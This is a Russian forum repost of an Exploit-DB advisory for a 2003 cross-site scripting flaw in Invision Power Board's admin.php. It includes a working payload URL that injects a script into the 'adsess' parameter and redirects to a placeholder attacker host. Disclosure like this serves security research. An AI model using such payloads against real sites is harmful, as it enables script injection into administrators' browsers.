Exploit Invision Power Board (IP.Board) 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23001
Проверка EDB
  1. Пройдено
Автор
BOY BEAR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-08-09
Код:
source: https://www.securityfocus.com/bid/8381/info

Invision Power Board admin.php script reported prone to a cross-site scripting vulnerability.

The issue presents itself due to a lack of sufficient sanitization performed by functions in an Invision Power Board script on user-influenced URI parameters. It has been reported that a remote attacker may construct a malicious link to the affected script hosted on a remote site, and supply arbitrary HTML code as a value for a URI parameter. If this link is followed, the content of the URI parameter will be rendered in the browser of the user who followed the link.

http://www.example.com/admin.php?adsess='><script>window.open
(window.location.search.substring
(78));</script><http://www.attacker.com?BoyBear$$$From$$$BinaryVision
 
Источник
www.exploit-db.com

Похожие темы